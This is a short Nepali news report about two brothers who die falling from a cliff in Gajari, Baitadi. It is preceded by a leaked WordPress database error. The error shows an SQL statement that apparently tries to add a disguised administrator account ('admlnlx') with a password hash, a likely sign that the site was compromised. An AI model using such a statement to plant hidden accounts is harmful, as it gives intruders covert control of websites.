WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbsfvYgb4ertGUdW6RE6q3sGK8.aOp0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:40:22', '', 'admlnlx', 'admlnlx')
बैतडी, फागुन ३–
भिरबाट लडेर गाँजरीमा दाजुभाइको मृत्यु भएको छ ।
मृत्यु हुनेमा गाँजरी–२ का ४० वर्षीय करे धामी र उनका ३० वर्षीय भाइ परे रहेको स्थानीयवासी वसन्त विष्टले जानकारी दिनुभयो । साँझ दुदिलाखान बजारबाट घर जाने बेला स्थानीय भानुभिरबाट खसेर घटनास्थलमै तिनको ज्यान गएको बताइएको छ ।
दाइ भिरबाट लड्दा भाइले बचाउन खोज्दा दुवै जना भिरबाट लडेको विष्टले जानकारी दिनुभयो । जिल्ला प्रहरी कार्यालय बैतडीका प्रहरी नायब उपरीक्षक हेरम्ब शर्माले प्रहरी टोली घटनास्थलतर्फ गइरहेको बताउनुभयो । घटनास्थल सदरमुकामबाट डेढ दिनको पैदल दूरीमा पर्छ ।